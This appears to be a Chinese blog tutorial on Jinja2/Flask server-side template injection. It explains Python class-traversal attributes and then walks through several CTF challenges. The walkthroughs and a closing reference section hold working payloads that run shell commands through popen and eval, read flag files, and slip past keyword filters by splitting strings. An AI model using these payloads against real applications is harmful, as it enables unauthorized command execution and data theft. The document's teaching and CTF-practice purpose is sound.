初识SSTI
什么是SSTI?
- SSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。
- 可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实际上这两者的思路都是相同的,因此可以类比来分析
引发SSTI的真正原因
- render_template渲染函数的问题
- 渲染函数在渲染的时候,往往对用户输入的变量不做渲染。
- 也就是说例如:
{{}}
在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}
包裹的内容当做变量解析替换。比如{{1+1}}
会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。
判断SSTI类型
- 上面提到网站模板引擎有jinja2、tornado、smarty、twig等等,那么如何判断遇到的是哪种类型?
- 广为流传的就是这张图了,根据处理返回值的不同来进行判别。(注意括号的数量等)
常用类
__class__
__class__
用来查看变量所属的类,格式为变量.__class__
>>> ''.__class__
<class 'str'>
>>> ().__class__
<class 'tuple'>
>>> {}.__class__
<class 'dict'>
>>> [].__class__
<class 'list'>
__bases__
__bases__
用来查看类的基类,注意是类的基类,所以格式为变量.__class__.__bases__
>>> ''.__class__.__bases__
(<class 'object'>,)
>>> ().__class__.__bases__
(<class 'object'>,)
>>> {}.__class__.__bases__
(<class 'object'>,)
>>> [].__class__.__bases__
(<class 'object'>,)
- 同时也能加上数组,比如
变量.__class__.__bases__[0]
来获得第一个基类。 - 值得一提的是还有个类是
__mro__
,它会显示类和基类,这是它和__bases__
的不同。
>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)
__subclasses__()
__subclasses__()
查看当前类的子类,格式变量.__class__.__bases__[0].__subclasses__()
- 这个类也可以加数组来查看指定的索引值,例如
变量.__class__.__bases__[0].__subclasses__()[1]
>>> ''.__class__.__bases__[0].__subclasses__()[0]
<class 'type'>
这个时候就可以开始利用类里面的方法了。
- 示例:
变量.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__
,__init__
初始化类,然后__globals__
全局来查找所有的方法及变量及参数。 - 由此我们可以看到各种各样的参数方法函数,去找一个可利用的function来执行,比如popen的话,就可以这样利用:
''.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']('dir').read()
- 大概是这么个原理,但这样说来还是不知道怎么利用,来看几道题就能更深刻理解了。
类的知识总结
关键词 | 解释 |
---|---|
__class__ | 类的一个内置属性,表示实例对象的类。 |
__base__ | 类型对象的直接基类 |
__bases__ | 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ |
__mro__ | 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 |
__subclasses__() | 返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order. |
__init__ | 初始化类,返回的类型是function |
__globals__ | 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。 |
__dic__ | 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里 |
__getattribute__() | 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。 |
__getitem__() | 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b') |
__builtins__ | 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。 |
__import__ | 动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()] |
__str__() | 返回描写这个对象的字符串,可以理解成就是打印出来。 |
url_for | flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。 |
get_flashed_messages | flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。 |
lipsum | flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}} |
current_app | 应用上下文,一个全局变量。 |
request | 可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read() |
request.args.x1 | get传参 |
request.values.x1 | 所有参数 |
request.cookies | cookies参数 |
request.headers | 请求头参数 |
request.form.x1 | post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data) |
request.data | post传参 (Content-Type:a/b) |
request.json | post传json (Content-Type: application/json) |
config | 当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} |
g | {{g}}得到<flask.g of 'flask_ssti'> |
常见过滤器
常用的过滤器 | 解释 |
---|---|
int() | 将值转换为int类型 |
float() | 将值转换为float类型 |
lower() | 将字符串转换为小写 |
upper() | 将字符串转换为大写 |
title() | 把值中的每个单词的首字母都转成大写 |
capitalize() | 把变量值的首字母转成大写,其余字母转小写 |
trim() | 截取字符串前面和后面的空白字符 |
wordcount() | 计算一个长字符串中单词的个数 |
reverse() | 字符串反转 |
replace(value,old,new) | 替换将old替换为new的字符串 |
truncate(value,length=255,killwords=False) | 截取length长度的字符串 |
striptags() | 删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格 |
escape()或e | 转义字符,会将< ,> 等符号转义成HTML中的符号。显例:content|escape 或content|e |
safe() | 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}} |
list() | 将变量列成列表 |
string() | 将变量转换成字符串 |
join() | 将一个序列中的参数值拼接成字符串。示例看上面payload |
abs() | 返回一个数值的绝对值 |
first() | 返回一个序列的第一个元素 |
last() | 返回一个序列的最后一个元素 |
format(value,arags,*kwargs) | 格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }} 将输出:Helloo? - Foo! |
length() | 返回一个序列或者字典的长度 |
sum() | 返回列表内数值的和 |
sort() | 返回排序后的列表 |
default(value,default_value,boolean=false) | 如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo') ----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。 |
length() | 返回字符串的长度,别名是count |
CTF例题
[BJDCTF]The mystery of ip
- 进来题目长这样,一看与ip有关,就可以想到可能与
X-Forwarded-For
或者client-ip
有关了
- 果然这里的IP是可控的,这道题比较有意思就在于:用
{7*7}
来判断一下发现这里居然是个SSTI注入
- 尝试一下系统命令:
{system('ls')}
,发现是可以使用的
- 尝试直接
{system('cat /flag')}
发现是没有waf的
[Bugku]Simple_SSTI_2
- 进来还是提示要传入
?flag=
,那就来看一下/?flag={{config}}
,看到如下内容
- 没什么有用的,既然如此就用ls来查看一下有哪些文件:
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27ls%27).read()}}
- 直接
cat flag
完事:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20flag%27).read()}}
Flask Plus-NCTF2018
- 点击网页上的各个按钮,点击右下角的小圆圈存在跳转,报错:
- 观察可知,这是直接将URL贴在报错信息中,联想到Flask的模板注入。测试payload:
{{7*7}}
-
经过测试,对一些常用payload的关键词存在检测,使用字符串拼接的办法进行绕过。
-
获取所有子类:
{{''['__cl'+'ass__']['__ba'+'ses__'][0]['__subcl'+'asses__']()}}
-
利用burp爆破找到可利用的类:
{{''['__cl'+'ass__']['__ba'+'ses__'][0]['__subcl'+'asses__']()[0]['__in'+'it__']['__glo'+'bals__']['__bui'+'ltins__']['ev'+'al']("__im"+"port__('o'+'s').po"+"pen('ls /').read()")}}
- 改命令为cat读取flag
{{''['__cl' 'ass__']['__ba' 'ses__'][0]['__subcl' 'asses__']()[100]['__in' 'it__']['__glo' 'bals__']['__bui' 'ltins__']['ev' 'al']("__im" "port__('o' 's').po" "pen('cat /Th1s_is__F1114g').read()")}}
参考payload
# i 为整型
{{''['__cl' 'ass__']['__ba' 'ses__'][0]['__subcl' 'asses__']()[i]['__in' 'it__']['__glo' 'bals__']['__bui' 'ltins__']['ev' 'al']("__im" "port__('o' 's').po" "pen('cat /flag').read()")}}
# i 为整型
{{""["__cla""ss__"]["__ba""se__"]["__subcl""asses__"]()[i]["__in""it__"]["__glo""bals__"]["__buil""tins__"]["eval"]("__import__("o""s")")["popen"]("cat /fl""ag")["read"]()}}
参考链接
最后一次更新于2024-01-24 09:33
0 条评论